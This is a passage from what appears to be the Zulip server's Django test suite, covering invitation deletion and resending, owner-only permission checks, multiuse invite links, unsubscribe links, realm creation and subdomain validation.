referred_by=user_profile, status=active_value)
prereg_user_three.save()
hamlet = self.example_user('hamlet')
othello = self.example_user('othello')
multiuse_invite_one = MultiuseInvite.objects.create(referred_by=hamlet, realm=realm)
create_confirmation_link(multiuse_invite_one, Confirmation.MULTIUSE_INVITE)
multiuse_invite_two = MultiuseInvite.objects.create(referred_by=othello, realm=realm)
create_confirmation_link(multiuse_invite_two, Confirmation.MULTIUSE_INVITE)
confirmation = Confirmation.objects.last()
confirmation.date_sent = expired_datetime
confirmation.save()
result = self.client_get("/json/invites")
self.assertEqual(result.status_code, 200)
self.assert_in_success_response(
["TestOne@zulip.com", hamlet.email],
result)
self.assert_not_in_success_response(
["TestTwo@zulip.com", "TestThree@zulip.com", "othello@zulip.com", othello.email],
result)
def test_successful_delete_invitation(self) -> None:
"""
A DELETE call to /json/invites/<ID> should delete the invite and
any scheduled invitation reminder emails.
"""
self.login('iago')
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ['Denmark']))
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify that the scheduled email exists.
ScheduledEmail.objects.get(address__iexact=invitee,
type=ScheduledEmail.INVITATION_REMINDER)
result = self.client_delete('/json/invites/' + str(prereg_user.id))
self.assertEqual(result.status_code, 200)
error_result = self.client_delete('/json/invites/' + str(prereg_user.id))
self.assert_json_error(error_result, "No such invitation")
self.assertRaises(ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(address__iexact=invitee,
type=ScheduledEmail.INVITATION_REMINDER))
def test_successful_member_delete_invitation(self) -> None:
"""
A DELETE call from member account to /json/invites/<ID> should delete the invite and
any scheduled invitation reminder emails.
"""
user_profile = self.example_user('hamlet')
self.login_user(user_profile)
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ['Denmark']))
# Verify that the scheduled email exists.
prereg_user = PreregistrationUser.objects.get(email=invitee,
referred_by=user_profile)
ScheduledEmail.objects.get(address__iexact=invitee,
type=ScheduledEmail.INVITATION_REMINDER)
# Verify another non-admin can't delete
result = self.api_delete(self.example_user("othello"),
'/api/v1/invites/' + str(prereg_user.id))
self.assert_json_error(result, "Must be an organization administrator")
# Verify that the scheduled email still exists.
prereg_user = PreregistrationUser.objects.get(email=invitee,
referred_by=user_profile)
ScheduledEmail.objects.get(address__iexact=invitee,
type=ScheduledEmail.INVITATION_REMINDER)
# Verify deletion works.
result = self.api_delete(user_profile,
'/api/v1/invites/' + str(prereg_user.id))
self.assertEqual(result.status_code, 200)
result = self.api_delete(user_profile,
'/api/v1/invites/' + str(prereg_user.id))
self.assert_json_error(result, "No such invitation")
self.assertRaises(ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(address__iexact=invitee,
type=ScheduledEmail.INVITATION_REMINDER))
def test_delete_owner_invitation(self) -> None:
self.login('desdemona')
owner = self.example_user('desdemona')
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ['Denmark'],
invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER']))
prereg_user = PreregistrationUser.objects.get(email=invitee)
result = self.api_delete(self.example_user('iago'),
'/api/v1/invites/' + str(prereg_user.id))
self.assert_json_error(result, "Must be an organization owner")
result = self.api_delete(owner, '/api/v1/invites/' + str(prereg_user.id))
self.assert_json_success(result)
result = self.api_delete(owner, '/api/v1/invites/' + str(prereg_user.id))
self.assert_json_error(result, "No such invitation")
self.assertRaises(ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(address__iexact=invitee,
type=ScheduledEmail.INVITATION_REMINDER))
def test_delete_multiuse_invite(self) -> None:
"""
A DELETE call to /json/invites/multiuse<ID> should delete the
multiuse_invite.
"""
self.login('iago')
zulip_realm = get_realm("zulip")
multiuse_invite = MultiuseInvite.objects.create(referred_by=self.example_user("hamlet"), realm=zulip_realm)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
self.assertEqual(result.status_code, 200)
self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
# Test that trying to double-delete fails
error_result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
self.assert_json_error(error_result, "No such invitation")
# Test deleting owner mutiuse_invite.
multiuse_invite = MultiuseInvite.objects.create(referred_by=self.example_user("desdemona"), realm=zulip_realm,
invited_as=PreregistrationUser.INVITE_AS['REALM_OWNER'])
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
error_result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
self.assert_json_error(error_result, 'Must be an organization owner')
self.login('desdemona')
result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite.id))
self.assert_json_success(result)
self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
# Test deleting multiuse invite from another realm
mit_realm = get_realm("zephyr")
multiuse_invite_in_mit = MultiuseInvite.objects.create(referred_by=self.mit_user("sipbtest"), realm=mit_realm)
create_confirmation_link(multiuse_invite_in_mit, Confirmation.MULTIUSE_INVITE)
error_result = self.client_delete('/json/invites/multiuse/' + str(multiuse_invite_in_mit.id))
self.assert_json_error(error_result, "No such invitation")
def test_successful_resend_invitation(self) -> None:
"""
A POST call to /json/invites/<ID>/resend should send an invitation reminder email
and delete any scheduled invitation reminder email.
"""
self.login('iago')
invitee = "resend_me@zulip.com"
self.assert_json_success(self.invite(invitee, ['Denmark']))
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify and then clear from the outbox the original invite email
self.check_sent_emails([invitee], custom_from_name="Zulip")
from django.core.mail import outbox
outbox.pop()
# Verify that the scheduled email exists.
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list('scheduled_timestamp', flat=True)
# Resend invite
result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
self.assertEqual(ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(original_timestamp,
scheduledemail_filter.values_list('scheduled_timestamp', flat=True))
self.assertEqual(result.status_code, 200)
error_result = self.client_post('/json/invites/' + str(9999) + '/resend')
self.assert_json_error(error_result, "No such invitation")
self.check_sent_emails([invitee], custom_from_name="Zulip")
def test_successful_member_resend_invitation(self) -> None:
"""A POST call from member a account to /json/invites/<ID>/resend
should send an invitation reminder email and delete any
scheduled invitation reminder email if they send the invite.
"""
self.login('hamlet')
user_profile = self.example_user('hamlet')
invitee = "resend_me@zulip.com"
self.assert_json_success(self.invite(invitee, ['Denmark']))
# Verify hamlet has only one invitation (Member can resend invitations only sent by him).
invitation = PreregistrationUser.objects.filter(referred_by=user_profile)
self.assertEqual(len(invitation), 1)
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify and then clear from the outbox the original invite email
self.check_sent_emails([invitee], custom_from_name="Zulip")
from django.core.mail import outbox
outbox.pop()
# Verify that the scheduled email exists.
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list('scheduled_timestamp', flat=True)
# Resend invite
result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
self.assertEqual(ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(original_timestamp,
scheduledemail_filter.values_list('scheduled_timestamp', flat=True))
self.assertEqual(result.status_code, 200)
error_result = self.client_post('/json/invites/' + str(9999) + '/resend')
self.assert_json_error(error_result, "No such invitation")
self.check_sent_emails([invitee], custom_from_name="Zulip")
self.logout()
self.login("othello")
invitee = "TestOne@zulip.com"
prereg_user_one = PreregistrationUser(email=invitee, referred_by=user_profile)
prereg_user_one.save()
prereg_user = PreregistrationUser.objects.get(email=invitee)
error_result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
self.assert_json_error(error_result, "Must be an organization administrator")
def test_resend_owner_invitation(self) -> None:
self.login("desdemona")
invitee = "resend_owner@zulip.com"
self.assert_json_success(self.invite(invitee, ['Denmark'],
invite_as=PreregistrationUser.INVITE_AS['REALM_OWNER']))
self.check_sent_emails([invitee], custom_from_name="Zulip")
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list('scheduled_timestamp', flat=True)
# Test only organization owners can resend owner invitation.
self.login('iago')
prereg_user = PreregistrationUser.objects.get(email=invitee)
error_result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
self.assert_json_error(error_result, "Must be an organization owner")
self.login('desdemona')
result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
self.assert_json_success(result)
self.assertEqual(ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER).count(), 1)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(original_timestamp,
scheduledemail_filter.values_list('scheduled_timestamp', flat=True))
def test_accessing_invites_in_another_realm(self) -> None:
inviter = UserProfile.objects.exclude(realm=get_realm('zulip')).first()
prereg_user = PreregistrationUser.objects.create(
email='email', referred_by=inviter, realm=inviter.realm)
self.login('iago')
error_result = self.client_post('/json/invites/' + str(prereg_user.id) + '/resend')
self.assert_json_error(error_result, "No such invitation")
error_result = self.client_delete('/json/invites/' + str(prereg_user.id))
self.assert_json_error(error_result, "No such invitation")
def test_prereg_user_status(self) -> None:
email = self.nonreg_email("alice")
password = "password"
realm = get_realm('zulip')
inviter = UserProfile.objects.first()
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split('/')[-1]
result = self.client_post(
"/accounts/register/",
{"key": registration_key,
"from_confirmation": "1",
"full_name": "alice"})
self.assertEqual(result.status_code, 200)
confirmation = Confirmation.objects.get(confirmation_key=registration_key)
prereg_user = confirmation.content_object
self.assertEqual(prereg_user.status, 0)
result = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(result.status_code, 302)
prereg_user = PreregistrationUser.objects.get(
email=email, referred_by=inviter, realm=realm)
self.assertEqual(prereg_user.status, confirmation_settings.STATUS_ACTIVE)
user = get_user_by_delivery_email(email, realm)
self.assertIsNotNone(user)
self.assertEqual(user.delivery_email, email)
class InviteeEmailsParserTests(TestCase):
def setUp(self) -> None:
super().setUp()
self.email1 = "email1@zulip.com"
self.email2 = "email2@zulip.com"
self.email3 = "email3@zulip.com"
def test_if_emails_separated_by_commas_are_parsed_and_striped_correctly(self) -> None:
emails_raw = f"{self.email1} ,{self.email2}, {self.email3}"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_separated_by_newlines_are_parsed_and_striped_correctly(self) -> None:
emails_raw = f"{self.email1}\n {self.email2}\n {self.email3} "
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_from_email_client_separated_by_newlines_are_parsed_correctly(self) -> None:
emails_raw = f"Email One <{self.email1}>\nEmailTwo<{self.email2}>\nEmail Three<{self.email3}>"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_in_mixed_style_are_parsed_correctly(self) -> None:
emails_raw = f"Email One <{self.email1}>,EmailTwo<{self.email2}>\n{self.email3}"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
class MultiuseInviteTest(ZulipTestCase):
def setUp(self) -> None:
super().setUp()
self.realm = get_realm('zulip')
self.realm.invite_required = True
self.realm.save()
def generate_multiuse_invite_link(self, streams: List[Stream]=None,
date_sent: Optional[datetime.datetime]=None) -> str:
invite = MultiuseInvite(realm=self.realm, referred_by=self.example_user("iago"))
invite.save()
if streams is not None:
invite.streams.set(streams)
if date_sent is None:
date_sent = timezone_now()
key = generate_key()
Confirmation.objects.create(content_object=invite, date_sent=date_sent,
confirmation_key=key, type=Confirmation.MULTIUSE_INVITE)
return confirmation_url(key, self.realm, Confirmation.MULTIUSE_INVITE)
def check_user_able_to_register(self, email: str, invite_link: str) -> None:
password = "password"
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
from django.core.mail import outbox
outbox.pop()
def test_valid_multiuse_link(self) -> None:
email1 = self.nonreg_email("test")
email2 = self.nonreg_email("test1")
email3 = self.nonreg_email("alice")
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS - 1)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
self.check_user_able_to_register(email1, invite_link)
self.check_user_able_to_register(email2, invite_link)
self.check_user_able_to_register(email3, invite_link)
def test_expired_multiuse_link(self) -> None:
email = self.nonreg_email('newuser')
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("The confirmation link has expired or been deactivated.", result)
def test_invalid_multiuse_link(self) -> None:
email = self.nonreg_email('newuser')
invite_link = "/join/invalid_key/"
result = self.client_post(invite_link, {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link is malformed.", result)
def test_invalid_multiuse_link_in_open_realm(self) -> None:
self.realm.invite_required = False
self.realm.save()
email = self.nonreg_email('newuser')
invite_link = "/join/invalid_key/"
with patch('zerver.views.registration.get_realm_from_request', return_value=self.realm):
with patch('zerver.views.registration.get_realm', return_value=self.realm):
self.check_user_able_to_register(email, invite_link)
def test_multiuse_link_with_specified_streams(self) -> None:
name1 = "newuser"
name2 = "bob"
email1 = self.nonreg_email(name1)
email2 = self.nonreg_email(name2)
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email1, invite_link)
self.check_user_subscribed_only_to_streams(name1, streams)
stream_names = ["Rome", "Verona"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email2, invite_link)
self.check_user_subscribed_only_to_streams(name2, streams)
def test_create_multiuse_link_api_call(self) -> None:
self.login('iago')
result = self.client_post('/json/invites/multiuse')
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
def test_create_multiuse_link_with_specified_streams_api_call(self) -> None:
self.login('iago')
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
stream_ids = [stream.id for stream in streams]
result = self.client_post('/json/invites/multiuse',
{"stream_ids": ujson.dumps(stream_ids)})
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
self.check_user_subscribed_only_to_streams("test", streams)
def test_only_admin_can_create_multiuse_link_api_call(self) -> None:
self.login('iago')
# Only admins should be able to create multiuse invites even if
# invite_by_admins_only is set to False.
self.realm.invite_by_admins_only = False
self.realm.save()
result = self.client_post('/json/invites/multiuse')
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
self.login('hamlet')
result = self.client_post('/json/invites/multiuse')
self.assert_json_error(result, "Must be an organization administrator")
def test_multiuse_link_for_inviting_as_owner(self) -> None:
self.login('iago')
result = self.client_post('/json/invites/multiuse',
{"invite_as": ujson.dumps(PreregistrationUser.INVITE_AS['REALM_OWNER'])})
self.assert_json_error(result, "Must be an organization owner")
self.login('desdemona')
result = self.client_post('/json/invites/multiuse',
{"invite_as": ujson.dumps(PreregistrationUser.INVITE_AS['REALM_OWNER'])})
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
def test_create_multiuse_link_invalid_stream_api_call(self) -> None:
self.login('iago')
result = self.client_post('/json/invites/multiuse',
{"stream_ids": ujson.dumps([54321])})
self.assert_json_error(result, "Invalid stream id 54321. No invites were sent.")
class EmailUnsubscribeTests(ZulipTestCase):
def test_error_unsubscribe(self) -> None:
# An invalid unsubscribe token "test123" produces an error.
result = self.client_get('/accounts/unsubscribe/missed_messages/test123')
self.assert_in_response('Unknown email unsubscribe request', result)
# An unknown message type "fake" produces an error.
user_profile = self.example_user('hamlet')
unsubscribe_link = one_click_unsubscribe_link(user_profile, "fake")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assert_in_response('Unknown email unsubscribe request', result)
def test_missedmessage_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in missed message
e-mails that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user('hamlet')
user_profile.enable_offline_email_notifications = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile,
"missed_messages")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_offline_email_notifications)
def test_welcome_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in welcome e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user('hamlet')
# Simulate a new user signing up, which enqueues 2 welcome e-mails.
enqueue_welcome_emails(user_profile)
self.assertEqual(2, ScheduledEmail.objects.filter(users=user_profile).count())
# Simulate unsubscribing from the welcome e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "welcome")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The welcome email jobs are no longer scheduled.
self.assertEqual(result.status_code, 200)
self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())
def test_digest_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in digest e-mails that you can
click even when logged out to stop receiving them.
Unsubscribing from these emails also dequeues any digest email jobs that
have been queued.
"""
user_profile = self.example_user('hamlet')
self.assertTrue(user_profile.enable_digest_emails)
# Enqueue a fake digest email.
context = {'name': '', 'realm_uri': '', 'unread_pms': [], 'hot_conversations': [],
'new_users': [], 'new_streams': {'plain': []}, 'unsubscribe_link': ''}
send_future_email('zerver/emails/digest', user_profile.realm,
to_user_ids=[user_profile.id], context=context)
self.assertEqual(1, ScheduledEmail.objects.filter(users=user_profile).count())
# Simulate unsubscribing from digest e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "digest")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The setting is toggled off, and scheduled jobs have been removed.
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_digest_emails)
self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())
def test_login_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in login
e-mails that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user('hamlet')
user_profile.enable_login_emails = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile, "login")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_login_emails)
class RealmCreationTest(ZulipTestCase):
@override_settings(OPEN_REALM_CREATION=True)
def check_able_to_create_realm(self, email: str, password: str="test") -> None:
notification_bot = get_system_bot(settings.NOTIFICATION_BOT)
signups_stream, _ = create_stream_if_needed(notification_bot.realm, 'signups')
string_id = "zuliptest"
# Make sure the realm does not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
# Create new realm with the email
result = self.client_post('/new/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, realm_subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].startswith('http://zuliptest.testserver/accounts/login/subdomain/'))
# Make sure the realm is created
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
user = get_user(email, realm)
self.assertEqual(user.realm, realm)
# Check that user is the owner.
self.assertEqual(user.role, UserProfile.ROLE_REALM_OWNER)
# Check defaults
self.assertEqual(realm.org_type, Realm.CORPORATE)
self.assertEqual(realm.emails_restricted_to_domains, False)
self.assertEqual(realm.invite_required, True)
# Check welcome messages
for stream_name, text, message_count in [
(Realm.DEFAULT_NOTIFICATION_STREAM_NAME, 'with the topic', 3),
(Realm.INITIAL_PRIVATE_STREAM_NAME, 'private stream', 1)]:
stream = get_stream(stream_name, realm)
recipient = stream.recipient
messages = Message.objects.filter(recipient=recipient).order_by('date_sent')
self.assertEqual(len(messages), message_count)
self.assertIn(text, messages[0].content)
# Check signup messages
recipient = signups_stream.recipient
messages = Message.objects.filter(recipient=recipient).order_by('id')
self.assertEqual(len(messages), 2)
self.assertIn('Signups enabled', messages[0].content)
self.assertIn('signed up', messages[1].content)
self.assertEqual('zuliptest', messages[1].topic_name())
# Piggyback a little check for how we handle
# empty string_ids.
realm.string_id = ''
self.assertEqual(realm.display_subdomain, '.')
def test_create_realm_non_existing_email(self) -> None:
self.check_able_to_create_realm("user1@test.com")
def test_create_realm_existing_email(self) -> None:
self.check_able_to_create_realm("hamlet@zulip.com")
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_create_realm_ldap_email(self) -> None:
self.init_default_ldap_database()
with self.settings(LDAP_EMAIL_ATTR="mail"):
self.check_able_to_create_realm("newuser_email@zulip.com",
self.ldap_password("newuser_with_email"))
def test_create_realm_as_system_bot(self) -> None:
result = self.client_post('/new/', {'email': 'notification-bot@zulip.com'})
self.assertEqual(result.status_code, 200)
self.assert_in_response('notification-bot@zulip.com is reserved for system bots', result)
def test_create_realm_no_creation_key(self) -> None:
"""
Trying to create a realm without a creation_key should fail when
OPEN_REALM_CREATION is false.
"""
email = "user1@test.com"
with self.settings(OPEN_REALM_CREATION=False):
# Create new realm with the email, but no creation key.
result = self.client_post('/new/', {'email': email})
self.assertEqual(result.status_code, 200)
self.assert_in_response('New organization creation disabled', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_with_subdomain(self) -> None:
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
# Make sure the realm does not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
# Create new realm with the email
result = self.client_post('/new/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name=realm_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=string_id + ".testserver")
self.assertEqual(result.status_code, 302)
result = self.client_get(result.url, subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, 'http://zuliptest.testserver')
# Make sure the realm is created
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True, FREE_TRIAL_DAYS=30)
def test_create_realm_during_free_trial(self) -> None:
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
result = self.client_post('/new/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name=realm_name,
HTTP_HOST=string_id + ".testserver")
self.assertEqual(result.status_code, 302)
result = self.client_get(result.url, subdomain=string_id)
self.assertEqual(result.url, 'http://zuliptest.testserver/upgrade/?onboarding=true')
result = self.client_get(result.url, subdomain=string_id)
self.assert_in_success_response(["Not ready to start your trial?"], result)
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True)
def test_mailinator_signup(self) -> None:
result = self.client_post('/new/', {'email': "hi@mailinator.com"})
self.assert_in_response('Please use your real email address.', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/new/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
errors = {'id': "length 3 or greater",
'-id': "cannot start or end with a",
'string-ID': "lowercase letters",
'string_id': "lowercase letters",
'stream': "unavailable",
'streams': "unavailable",
'about': "unavailable",
'abouts': "unavailable",
'zephyr': "unavailable"}
for string_id, error_msg in errors.items():
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = string_id,
realm_name = realm_name)
self.assert_in_response(error_msg, result)
# test valid subdomain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'a-0',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith('http://a-0.testserver/accounts/login/subdomain/'))
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/new/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = '',
realm_name = realm_name)
self.assert_in_response('unavailable', result)
# test valid use of root domain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = '',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith('http://testserver/accounts/login/subdomain/'))
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain_option(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post('/new/', {'email': email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'abcdef',
realm_in_root_domain = 'true',
realm_name = realm_name)
self.assert_in_response('unavailable', result)
# test valid use of root domain
result = self.submit_reg_form_for_user(email, password,
realm_subdomain = 'abcdef',
realm_in_root_domain = 'true',
realm_name = realm_name)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith('http://testserver/accounts/login/subdomain/'))
def test_is_root_domain_available(self) -> None:
self.assertTrue(is_root_domain_available())
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
self.assertFalse(is_root_domain_available())
realm = get_realm("zulip")
realm.string_id = Realm.SUBDOMAIN_FOR_ROOT_DOMAIN
realm.save()
self.assertFalse(is_root_domain_available())
def test_subdomain_check_api(self) -> None:
result = self.client_get("/json/realm/subdomain/zulip")
self.assert_in_success_response(["Subdomain unavailable. Please choose a different one."], result)
result = self.client_get("/json/realm/subdomain/zu_lip")
self.assert_in_success_response(["Subdomain can only have lowercase letters, numbers, and \'-\'s."], result)
result = self.client_get("/json/realm/subdomain/hufflepuff")
self.assert_in_success_response(["available"], result)
self.assert_not_in_success_response(["unavailable"], result)
def test_subdomain_check_management_command(self) -> None:
# Short names should work
check_subdomain_available('aa', from_management_command=True)
# So should reserved ones
check_subdomain_available('zulip', from_management_command=True)
# malformed names should still not
with self.assertRaises(ValidationError):
check_subdomain_available('-ba_d-', from_management_command=True)
class UserSignUpTest(InviteUserBase):
def _assert_redirected_to(self, result: HttpResponse, url: str) -> None:
self.assertEqual(result.status_code, 302)
self.assertEqual(result['LOCATION'], url)
def test_bad_email_configuration_for_accounts_home(self) -> None:
"""
Make sure we redirect for SMTP errors.
"""
email = self.nonreg_email('newguy')
smtp_mock = patch(
